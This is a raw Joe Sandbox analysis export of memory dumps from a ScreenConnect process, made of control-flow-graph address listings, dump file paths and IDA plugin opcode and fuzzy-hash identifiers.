                                                                                    control_flow_graph 1452 7ffd9b7207fa-7ffd9b7207fe 1453 7ffd9b7207ff-7ffd9b720802 1452->1453 1454 7ffd9b72079f-7ffd9b7207a9 1453->1454 1455 7ffd9b720804-7ffd9b72080c 1453->1455 1456 7ffd9b7207af-7ffd9b7207b9 1454->1456 1459 7ffd9b72080f-7ffd9b720812 1455->1459 1458 7ffd9b7207bf-7ffd9b7207c2 1456->1458 1460 7ffd9b72075f-7ffd9b720761 1458->1460 1461 7ffd9b7207c4-7ffd9b7207ce 1458->1461 1459->1456 1462 7ffd9b720814-7ffd9b720822 1459->1462 1465 7ffd9b720763-7ffd9b720772 1460->1465 1466 7ffd9b7207cf-7ffd9b7207d1 1461->1466 1462->1458 1467 7ffd9b720824-7ffd9b720825 1462->1467 1470 7ffd9b720732 1465->1470 1471 7ffd9b720777-7ffd9b72077a 1465->1471 1466->1459 1469 7ffd9b720827-7ffd9b720832 1467->1469 1469->1466 1474 7ffd9b720834-7ffd9b720835 1469->1474 1472 7ffd9b720737-7ffd9b72073a 1470->1472 1475 7ffd9b720717 1471->1475 1476 7ffd9b72077c-7ffd9b72078a 1471->1476 1478 7ffd9b7206d7-7ffd9b7206d9 1472->1478 1479 7ffd9b72073c-7ffd9b724a96 1472->1479 1477 7ffd9b720837-7ffd9b720849 1474->1477 1481 7ffd9b720718-7ffd9b720720 1475->1481 1485 7ffd9b720727-7ffd9b720731 1476->1485 1486 7ffd9b72078c-7ffd9b72079a 1476->1486 1488 7ffd9b720887-7ffd9b72088a 1477->1488 1489 7ffd9b72084b-7ffd9b720862 1477->1489 1478->1481 1482 7ffd9b7206db-7ffd9b7206ea 1478->1482 1514 7ffd9b724ac1-7ffd9b724af4 1479->1514 1515 7ffd9b724a98-7ffd9b724ab9 1479->1515 1481->1465 1493 7ffd9b720722 1481->1493 1501 7ffd9b720687-7ffd9b7206b8 1482->1501 1502 7ffd9b7206ec-7ffd9b7206f1 1482->1502 1485->1472 1486->1472 1497 7ffd9b72079c-7ffd9b72079d 1486->1497 1488->1469 1492 7ffd9b72088b-7ffd9b72089a 1488->1492 1489->1453 1508 7ffd9b720864-7ffd9b720865 1489->1508 1492->1477 1506 7ffd9b72089c-7ffd9b7208ad 1492->1506 1499 7ffd9b7206bf-7ffd9b7206d5 1493->1499 1500 7ffd9b720724-7ffd9b720725 1493->1500 1497->1454 1499->1478 1500->1485 1501->1499 1513 7ffd9b7208af-7ffd9b7208c8 1506->1513 1509 7ffd9b720867-7ffd9b720886 1508->1509 1509->1488 1524 7ffd9b720927-7ffd9b720932 1513->1524 1525 7ffd9b7208ca 1513->1525 1517 7ffd9b724c34-7ffd9b724c63 1514->1517 1518 7ffd9b724afa-7ffd9b724b16 1514->1518 1515->1514 1522 7ffd9b724cb4-7ffd9b724cc8 1517->1522 1523 7ffd9b724c65-7ffd9b724c6f call 7ffd9b723d00 1517->1523 1518->1517 1535 7ffd9b724b1c-7ffd9b724bd6 1518->1535 1532 7ffd9b724cf8-7ffd9b724d03 1522->1532 1533 7ffd9b724cca-7ffd9b724cd4 1522->1533 1523->1522 1541 7ffd9b724c71-7ffd9b724c83 1523->1541 1527 7ffd9b7208cf-7ffd9b7208d1 1524->1527 1528 7ffd9b720934-7ffd9b72095a 1524->1528 1525->1509 1531 7ffd9b7208cc-7ffd9b7208cd 1525->1531 1539 7ffd9b72090e-7ffd9b720912 1527->1539 1552 7ffd9b7208f7-7ffd9b7208f9 1528->1552 1553 7ffd9b72095c-7ffd9b7209cd 1528->1553 1531->1527 1533->1532 1534 7ffd9b724cd6-7ffd9b724ce7 1533->1534 1534->1532 1547 7ffd9b724ce9-7ffd9b724cf1 1534->1547 1535->1517 1568 7ffd9b724bd8-7ffd9b724be8 1535->1568 1539->1513 1540 7ffd9b720914-7ffd9b720925 1539->1540 1540->1524 1541->1522 1546 7ffd9b724c85-7ffd9b724caf call 7ffd9b723d10 1541->1546 1546->1522 1547->1532 1552->1539 1569 7ffd9b7209cf-7ffd9b7209e1 1553->1569 1568->1517 1570 7ffd9b724bea-7ffd9b724c2f call 7ffd9b723cf0 1568->1570 1572 7ffd9b7209e6-7ffd9b7209ed 1569->1572 1570->1517
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _
                                                                                    • API String ID: 0-701932520
                                                                                    • Opcode ID: 311c2d83a328c07471707459830aaa28a6cd0047f4213bec8d254fb441215aa1
                                                                                    • Instruction ID: 839bdec48abb449c75a65351e2e0f0649ddc6005fc9c42c1b5eef07ceb359e0b
                                                                                    • Opcode Fuzzy Hash: 311c2d83a328c07471707459830aaa28a6cd0047f4213bec8d254fb441215aa1
                                                                                    • Instruction Fuzzy Hash: 6491C953A0F3D65FFB269A6C98B54E53F60EF52A2470A02B7C0D88B0B3DD14754A8771

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1573 7ffd9b726b47-7ffd9b726b61 1576 7ffd9b726b63-7ffd9b726b65 1573->1576 1577 7ffd9b726b67-7ffd9b726b75 1573->1577 1578 7ffd9b726b78-7ffd9b726b79 1576->1578 1577->1578 1580 7ffd9b726b80-7ffd9b726b81 1578->1580 1581 7ffd9b726b88-7ffd9b726b8f 1580->1581 1582 7ffd9b726cde-7ffd9b726cfc call 7ffd9b720c30 * 2 1581->1582 1583 7ffd9b726b95-7ffd9b726b9c 1581->1583 1592 7ffd9b726cfe-7ffd9b726d08 1582->1592 1593 7ffd9b726d26-7ffd9b726d44 call 7ffd9b720c30 * 2 1582->1593 1583->1582 1585 7ffd9b726ba2-7ffd9b726bb9 1583->1585 1589 7ffd9b726bee-7ffd9b726bf9 1585->1589 1590 7ffd9b726bbb-7ffd9b726bcd 1585->1590 1603 7ffd9b726bff-7ffd9b726c0e 1589->1603 1604 7ffd9b726bfb-7ffd9b726bfd 1589->1604 1600 7ffd9b726bcf-7ffd9b726bd1 1590->1600 1601 7ffd9b726bd3-7ffd9b726be1 1590->1601 1595 7ffd9b726d0a-7ffd9b726d1a 1592->1595 1596 7ffd9b726d1c 1592->1596 1615 7ffd9b726d4a-7ffd9b726d55 1593->1615 1616 7ffd9b726dfb-7ffd9b726e06 1593->1616 1602 7ffd9b726d1e-7ffd9b726d1f 1595->1602 1596->1602 1606 7ffd9b726be4-7ffd9b726be7 1600->1606 1601->1606 1602->1593 1608 7ffd9b726c11-7ffd9b726c13 1603->1608 1604->1608 1606->1589 1611 7ffd9b726cc8-7ffd9b726cd8 1608->1611 1612 7ffd9b726c19-7ffd9b726c30 1608->1612 1611->1582 1612->1611 1619 7ffd9b726c36-7ffd9b726c53 1612->1619 1621 7ffd9b726d57-7ffd9b726d59 1615->1621 1622 7ffd9b726d5b-7ffd9b726d6a 1615->1622 1623 7ffd9b726e08-7ffd9b726e0a 1616->1623 1624 7ffd9b726e0c-7ffd9b726e1b 1616->1624 1638 7ffd9b726c5f 1619->1638 1639 7ffd9b726c55-7ffd9b726c5d 1619->1639 1625 7ffd9b726d6d-7ffd9b726db1 1621->1625 1622->1625 1627 7ffd9b726e1e-7ffd9b726e20 1623->1627 1624->1627 1635 7ffd9b726dc4-7ffd9b726dcc 1625->1635 1636 7ffd9b726db3-7ffd9b726dbb 1625->1636 1631 7ffd9b726f72-7ffd9b726f7d 1627->1631 1632 7ffd9b726e26-7ffd9b726e66 call 7ffd9b720c30 * 2 1627->1632 1632->1631 1662 7ffd9b726e6c-7ffd9b726e73 1632->1662 1640 7ffd9b726dcd-7ffd9b726dce 1635->1640 1642 7ffd9b726dde-7ffd9b726df8 1635->1642 1636->1640 1641 7ffd9b726dbd-7ffd9b726dc2 1636->1641 1645 7ffd9b726c61-7ffd9b726c63 1638->1645 1639->1645 1643 7ffd9b726dd3-7ffd9b726ddd call 7ffd9b725b50 1640->1643 1641->1643 1642->1616 1643->1642 1645->1611 1646 7ffd9b726c65-7ffd9b726c6f 1645->1646 1651 7ffd9b726c7d-7ffd9b726c85 1646->1651 1652 7ffd9b726c71-7ffd9b726c7b call 7ffd9b723d00 1646->1652 1657 7ffd9b726cb3-7ffd9b726cc6 call 7ffd9b725b40 1651->1657 1658 7ffd9b726c87-7ffd9b726cac call 7ffd9b725928 1651->1658 1652->1582 1652->1651 1657->1582 1658->1657 1664 7ffd9b726e86-7ffd9b726e88 1662->1664 1665 7ffd9b726e75-7ffd9b726e84 1662->1665 1668 7ffd9b726e8f-7ffd9b726eb3 1664->1668 1665->1664 1672 7ffd9b726e8a 1665->1672 1674 7ffd9b726eff-7ffd9b726f15 1668->1674 1675 7ffd9b726eb5-7ffd9b726ed2 1668->1675 1672->1668 1678 7ffd9b726f7e-7ffd9b726f96 1675->1678 1679 7ffd9b726ed8-7ffd9b726efd 1675->1679 1684 7ffd9b726fd7-7ffd9b726fd8 1678->1684 1679->1674 1685 7ffd9b727020-7ffd9b727031 1684->1685 1686 7ffd9b726fda-7ffd9b726ff7 1684->1686 1692 7ffd9b726fce-7ffd9b726fd6 1685->1692 1693 7ffd9b727033-7ffd9b72703d 1685->1693 1690 7ffd9b727040-7ffd9b727096 1686->1690 1691 7ffd9b726ff9-7ffd9b72701e 1686->1691 1700 7ffd9b727098-7ffd9b727099 1690->1700 1701 7ffd9b72709c-7ffd9b7270c0 1690->1701 1691->1685 1692->1684 1693->1690 1700->1701 1705 7ffd9b7270f2-7ffd9b7270fb 1701->1705 1706 7ffd9b7270c2-7ffd9b7270d1 1701->1706 1707 7ffd9b7270d3-7ffd9b7270d4 1706->1707 1708 7ffd9b7270d7-7ffd9b7270f1 1706->1708 1707->1708
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: b1f633b279ced9c44329c6b2fc2a00ae2009f8ff0c16ee8472db23f2d40ec605
                                                                                    • Instruction ID: 3cc9e5885788c9af213a120b1c282768d5be2564c32606ab96d255951274625a
                                                                                    • Opcode Fuzzy Hash: b1f633b279ced9c44329c6b2fc2a00ae2009f8ff0c16ee8472db23f2d40ec605
                                                                                    • Instruction Fuzzy Hash: DB719C31F1AB1F4AEB79A7A484706BD72D2EF94344F52453AD40EC62F1DD38FA419640

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1711 7ffd9b720828-7ffd9b720832 1713 7ffd9b7207cf-7ffd9b7207d1 1711->1713 1714 7ffd9b720834-7ffd9b720835 1711->1714 1718 7ffd9b72080f-7ffd9b720812 1713->1718 1715 7ffd9b720837-7ffd9b720849 1714->1715 1719 7ffd9b720887-7ffd9b72088a 1715->1719 1720 7ffd9b72084b-7ffd9b720862 1715->1720 1721 7ffd9b7207af-7ffd9b7207b9 1718->1721 1722 7ffd9b720814-7ffd9b720822 1718->1722 1723 7ffd9b720827-7ffd9b720832 1719->1723 1724 7ffd9b72088b-7ffd9b72089a 1719->1724 1734 7ffd9b7207ff-7ffd9b720802 1720->1734 1735 7ffd9b720864-7ffd9b720865 1720->1735 1726 7ffd9b7207bf-7ffd9b7207c2 1721->1726 1722->1726 1732 7ffd9b720824-7ffd9b720825 1722->1732 1723->1713 1723->1714 1724->1715 1733 7ffd9b72089c-7ffd9b7208ad 1724->1733 1730 7ffd9b72075f-7ffd9b720761 1726->1730 1731 7ffd9b7207c4-7ffd9b7207ce 1726->1731 1740 7ffd9b720763-7ffd9b720772 1730->1740 1731->1713 1732->1723 1744 7ffd9b7208af-7ffd9b7208c8 1733->1744 1737 7ffd9b72079f-7ffd9b7207a9 1734->1737 1738 7ffd9b720804-7ffd9b72080c 1734->1738 1736 7ffd9b720867-7ffd9b720886 1735->1736 1736->1719 1737->1721 1738->1718 1746 7ffd9b720732 1740->1746 1747 7ffd9b720777-7ffd9b72077a 1740->1747 1752 7ffd9b720927-7ffd9b720932 1744->1752 1753 7ffd9b7208ca 1744->1753 1749 7ffd9b720737-7ffd9b72073a 1746->1749 1750 7ffd9b720717 1747->1750 1751 7ffd9b72077c-7ffd9b72078a 1747->1751 1757 7ffd9b7206d7-7ffd9b7206d9 1749->1757 1758 7ffd9b72073c-7ffd9b724a96 1749->1758 1760 7ffd9b720718-7ffd9b720720 1750->1760 1765 7ffd9b720727-7ffd9b720731 1751->1765 1766 7ffd9b72078c-7ffd9b72079a 1751->1766 1754 7ffd9b7208cf-7ffd9b7208d1 1752->1754 1755 7ffd9b720934-7ffd9b72095a 1752->1755 1753->1736 1761 7ffd9b7208cc-7ffd9b7208cd 1753->1761 1767 7ffd9b72090e-7ffd9b720912 1754->1767 1787 7ffd9b7208f7-7ffd9b7208f9 1755->1787 1788 7ffd9b72095c-7ffd9b7209cd 1755->1788 1757->1760 1763 7ffd9b7206db-7ffd9b7206ea 1757->1763 1791 7ffd9b724ac1-7ffd9b724af4 1758->1791 1792 7ffd9b724a98-7ffd9b724ab9 1758->1792 1760->1740 1774 7ffd9b720722 1760->1774 1761->1754 1780 7ffd9b720687-7ffd9b7206b8 1763->1780 1781 7ffd9b7206ec-7ffd9b7206f1 1763->1781 1765->1749 1766->1749 1777 7ffd9b72079c-7ffd9b72079d 1766->1777 1767->1744 1768 7ffd9b720914-7ffd9b720925 1767->1768 1768->1752 1778 7ffd9b7206bf-7ffd9b7206d5 1774->1778 1779 7ffd9b720724-7ffd9b720725 1774->1779 1777->1737 1778->1757 1779->1765 1780->1778 1787->1767 1823 7ffd9b7209cf-7ffd9b7209e1 1788->1823 1794 7ffd9b724c34-7ffd9b724c63 1791->1794 1795 7ffd9b724afa-7ffd9b724b16 1791->1795 1792->1791 1798 7ffd9b724cb4-7ffd9b724cc8 1794->1798 1799 7ffd9b724c65-7ffd9b724c6f call 7ffd9b723d00 1794->1799 1795->1794 1806 7ffd9b724b1c-7ffd9b724bd6 1795->1806 1803 7ffd9b724cf8-7ffd9b724d03 1798->1803 1804 7ffd9b724cca-7ffd9b724cd4 1798->1804 1799->1798 1810 7ffd9b724c71-7ffd9b724c83 1799->1810 1804->1803 1805 7ffd9b724cd6-7ffd9b724ce7 1804->1805 1805->1803 1816 7ffd9b724ce9-7ffd9b724cf1 1805->1816 1806->1794 1830 7ffd9b724bd8-7ffd9b724be8 1806->1830 1810->1798 1814 7ffd9b724c85-7ffd9b724caf call 7ffd9b723d10 1810->1814 1814->1798 1816->1803 1825 7ffd9b7209e6-7ffd9b7209ed 1823->1825 1830->1794 1831 7ffd9b724bea-7ffd9b724c2f call 7ffd9b723cf0 1830->1831 1831->1794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: _
                                                                                    • API String ID: 0-701932520
                                                                                    • Opcode ID: efaa26ca8613514d7e6b90fe901dbeb3f3aa9992af797fb24fd9ac5625efb45b
                                                                                    • Instruction ID: a75924ed0daa0f40951a6b762c09ee8ee1adb80774159f277a26ab0162481423
                                                                                    • Opcode Fuzzy Hash: efaa26ca8613514d7e6b90fe901dbeb3f3aa9992af797fb24fd9ac5625efb45b
                                                                                    • Instruction Fuzzy Hash: 8351B367A0F3D65FEB269A6C98B64D53F60EF52A2470A02F7C0C44B0B3DD14754A87A1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1925 7ffd9b7244b3-7ffd9b7244be 1927 7ffd9b7244c0-7ffd9b7244dc 1925->1927 1928 7ffd9b724522-7ffd9b724577 call 7ffd9b723b68 1925->1928 1936 7ffd9b72457c-7ffd9b724590 1928->1936
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: o
                                                                                    • API String ID: 0-252678980
                                                                                    • Opcode ID: 379dee664ebd8a11ed33baaa48ba33156798ca7bde3a92b848e34bca2951c879
                                                                                    • Instruction ID: 531c06546ae529dae48f2b291af0c4a0ec7237fc053e5148b0bf224e2ea68aba
                                                                                    • Opcode Fuzzy Hash: 379dee664ebd8a11ed33baaa48ba33156798ca7bde3a92b848e34bca2951c879
                                                                                    • Instruction Fuzzy Hash: B3115732E1AA8D1FEB55DB6884259BCBFA1EF81200F0542FAD048C70E6DD2866058340

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2064 7ffd9b72000c-7ffd9b72008e 2075 7ffd9b720090-7ffd9b7200d7 2064->2075 2076 7ffd9b7200d8-7ffd9b7200dd 2064->2076 2075->2076 2077 7ffd9b7200de 2076->2077 2078 7ffd9b7200df-7ffd9b720100 2076->2078 2077->2078 2084 7ffd9b720102-7ffd9b720121 2078->2084 2085 7ffd9b720124-7ffd9b72013c 2078->2085 2084->2085 2089 7ffd9b72013e-7ffd9b72015d 2085->2089 2090 7ffd9b720160-7ffd9b72017e 2085->2090 2089->2090 2093 7ffd9b720180-7ffd9b720198 2090->2093 2094 7ffd9b72019a-7ffd9b7201a5 2090->2094 2093->2094 2098 7ffd9b72023e-7ffd9b720241 2094->2098 2099 7ffd9b7201ab-7ffd9b7201b4 2094->2099 2102 7ffd9b720243-7ffd9b72024d 2098->2102 2103 7ffd9b720298-7ffd9b7202a6 2098->2103 2100 7ffd9b7201cd-7ffd9b7201d8 2099->2100 2101 7ffd9b7201b6-7ffd9b7201c3 2099->2101 2104 7ffd9b720224-7ffd9b720238 2100->2104 2105 7ffd9b7201da-7ffd9b7201f7 2100->2105 2101->2100 2110 7ffd9b7201c5-7ffd9b7201cb 2101->2110 2111 7ffd9b720255-7ffd9b72026e 2102->2111 2116 7ffd9b7202b0-7ffd9b7202b6 2103->2116 2104->2098 2114 7ffd9b7204bd-7ffd9b7204df 2104->2114 2112 7ffd9b7201fd-7ffd9b720222 2105->2112 2113 7ffd9b7204e2-7ffd9b72053f 2105->2113 2110->2100 2119 7ffd9b720270-7ffd9b720272 2111->2119 2120 7ffd9b7202df-7ffd9b7202ea 2111->2120 2112->2104 2151 7ffd9b720541-7ffd9b72054a 2113->2151 2152 7ffd9b72054b-7ffd9b720552 2113->2152 2114->2113 2123 7ffd9b720400-7ffd9b72041e 2116->2123 2124 7ffd9b7202ba-7ffd9b7202c6 2116->2124 2125 7ffd9b7202ee-7ffd9b7202fa 2119->2125 2126 7ffd9b720274 2119->2126 2127 7ffd9b7202eb-7ffd9b7202ec 2120->2127 2123->2114 2147 7ffd9b720424-7ffd9b72042e 2123->2147 2130 7ffd9b7202c8-7ffd9b7202ca 2124->2130 2131 7ffd9b7202cc-7ffd9b7202da 2124->2131 2133 7ffd9b720300-7ffd9b720301 2125->2133 2134 7ffd9b7202fc-7ffd9b7202fe 2125->2134 2126->2124 2132 7ffd9b720276-7ffd9b72027a 2126->2132 2127->2125 2137 7ffd9b7202dd-7ffd9b7202de 2130->2137 2131->2137 2132->2127 2139 7ffd9b72027c-7ffd9b720281 2132->2139 2142 7ffd9b720302-7ffd9b72030e 2133->2142 2140 7ffd9b720311-7ffd9b720315 2134->2140 2137->2120 2139->2142 2143 7ffd9b720283-7ffd9b72028e 2139->2143 2144 7ffd9b720316-7ffd9b72032e 2140->2144 2142->2140 2148 7ffd9b720290-7ffd9b720295 2143->2148 2149 7ffd9b7202ff 2143->2149 2159 7ffd9b720330-7ffd9b720332 2144->2159 2160 7ffd9b720334-7ffd9b720342 2144->2160 2153 7ffd9b720430-7ffd9b720432 2147->2153 2154 7ffd9b720434-7ffd9b720442 2147->2154 2148->2144 2157 7ffd9b720297 2148->2157 2149->2133 2155 7ffd9b72055e-7ffd9b720569 2152->2155 2156 7ffd9b720554-7ffd9b72055d 2152->2156 2161 7ffd9b720445-7ffd9b720462 2153->2161 2154->2161 2157->2103 2163 7ffd9b720345-7ffd9b720362 2159->2163 2160->2163 2168 7ffd9b720464-7ffd9b720466 2161->2168 2169 7ffd9b720468-7ffd9b720476 2161->2169 2170 7ffd9b720364-7ffd9b720366 2163->2170 2171 7ffd9b720368-7ffd9b720376 2163->2171 2172 7ffd9b720479-7ffd9b720496 2168->2172 2169->2172 2173 7ffd9b720379-7ffd9b72038f 2170->2173 2171->2173 2178 7ffd9b720498-7ffd9b72049a 2172->2178 2179 7ffd9b72049c-7ffd9b7204aa 2172->2179 2181 7ffd9b720391-7ffd9b7203a4 2173->2181 2182 7ffd9b7203a6-7ffd9b7203ad 2173->2182 2180 7ffd9b7204ad-7ffd9b7204b6 2178->2180 2179->2180 2180->2114 2181->2182 2186 7ffd9b7203cd-7ffd9b7203d0 2181->2186 2185 7ffd9b7203b4-7ffd9b7203c7 2182->2185 2185->2186 2187 7ffd9b7203d2-7ffd9b7203e5 2186->2187 2188 7ffd9b7203e7-7ffd9b7203fa 2186->2188 2187->2123 2187->2188 2188->2123
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b77ffc9b31ee940bc64d8d39f09492ec1687293712f0f75b697a0fecf5e6449c
                                                                                    • Instruction ID: 88584a89127eebcdb7757f84536dd67885897e2be890d77a5b6b648db603a575
                                                                                    • Opcode Fuzzy Hash: b77ffc9b31ee940bc64d8d39f09492ec1687293712f0f75b697a0fecf5e6449c
                                                                                    • Instruction Fuzzy Hash: 36120371B0EB4E4FE7A9DAAC88756B537D1EF59700F0502BAD48DCB1B3DD28A9058360
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 973e67c08514bcdec900022b77171a6225b55ab72cf88c3d0db9992451b5dbb9
                                                                                    • Instruction ID: ab5026a3517395d44c7713b4ac7a316b13c08668917e98cb70353bfea7329e6c
                                                                                    • Opcode Fuzzy Hash: 973e67c08514bcdec900022b77171a6225b55ab72cf88c3d0db9992451b5dbb9
                                                                                    • Instruction Fuzzy Hash: 24B12832B0EF4E0FEB69EA2484618B577E1EF61350705027DD58E875E7EE15FA0A8780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24ef3a8c5e4e77ee169af27297f5da87b0d55e66a3272ec6291cde8bc7d4f74a
                                                                                    • Instruction ID: 3d1781dfedf928504006f293b3bbe61ae6131ede0e52bf2aef411e631ff393bd
                                                                                    • Opcode Fuzzy Hash: 24ef3a8c5e4e77ee169af27297f5da87b0d55e66a3272ec6291cde8bc7d4f74a
                                                                                    • Instruction Fuzzy Hash: 9BC1E835B0EB4A4FDB9CEF6CC0A0AA077A1FF5431472506BAC059CF1A7CA25E886C750
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fdeedebac3e7cf87a625bbf2ab2717b3f67b7ead73918e38db7216704259a8a
                                                                                    • Instruction ID: 2f287e081d5f5419b95d97ca71657d334dc8ed37d40f416d629426dcc9905b76
                                                                                    • Opcode Fuzzy Hash: 0fdeedebac3e7cf87a625bbf2ab2717b3f67b7ead73918e38db7216704259a8a
                                                                                    • Instruction Fuzzy Hash: 48A17A21B1EB8E0FEB699B7844655B477E1EF55300B0902FBD448C71F7DE19B9068381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f683fbf5abe2d978dc3e9f3d50b6f1c4613178c65e287b3b114cac1f4579ee09
                                                                                    • Instruction ID: 18ff32bd57c4924bde73db6eb93df3316a3810a50f3235ff6e3ce274bd17b6f2
                                                                                    • Opcode Fuzzy Hash: f683fbf5abe2d978dc3e9f3d50b6f1c4613178c65e287b3b114cac1f4579ee09
                                                                                    • Instruction Fuzzy Hash: 3581D535B0EB4A4FDB9CFF6CD0A0AA177A1FF5431472506B9C059CB1A7CA24E886C790
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 44de6e43a1c42fd253d0ab20b76cef02457c6c140be194b5201d85b7a8f7a933
                                                                                    • Instruction ID: 34ddbf756b7062fb6dd1433c9b71aac376023df76c027cdb7e538131ce6db0aa
                                                                                    • Opcode Fuzzy Hash: 44de6e43a1c42fd253d0ab20b76cef02457c6c140be194b5201d85b7a8f7a933
                                                                                    • Instruction Fuzzy Hash: 3F61F953D0F7CA5FE721ABB884758E47FA0FF11A1471A02BAC0D84B0B3DA197555C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 20d0c3e17d5c27215f4234e6023e609546f16d803dfbc64255e3f76106b40baa
                                                                                    • Instruction ID: 50570bab830c04f6ca1fe071d2d517d75a4bd0527f48923c74b3f0f9a08069c7
                                                                                    • Opcode Fuzzy Hash: 20d0c3e17d5c27215f4234e6023e609546f16d803dfbc64255e3f76106b40baa
                                                                                    • Instruction Fuzzy Hash: A051B167A0F3D65FEB269A6C98B64D53F60EF52A2470A02F7C0C48B0B3DD14754A83A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 11f249a5773b3b7959a805220f722669337fe598def6618fe160f5de8b4bb8e8
                                                                                    • Instruction ID: 19c1a746124ac1d46155b4f3cf266f7faeb546e7283b5765c21e0decd891b5fe
                                                                                    • Opcode Fuzzy Hash: 11f249a5773b3b7959a805220f722669337fe598def6618fe160f5de8b4bb8e8
                                                                                    • Instruction Fuzzy Hash: 7B51A223A0F7D65FFB229A7C94B64D53F60EF12A2471A03B7C0C48B0B3D915755A87A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b25e57edbd3c09a9cf5dc1add27778e21ebad5a3648b8ab1bd2dee3d5d08c12c
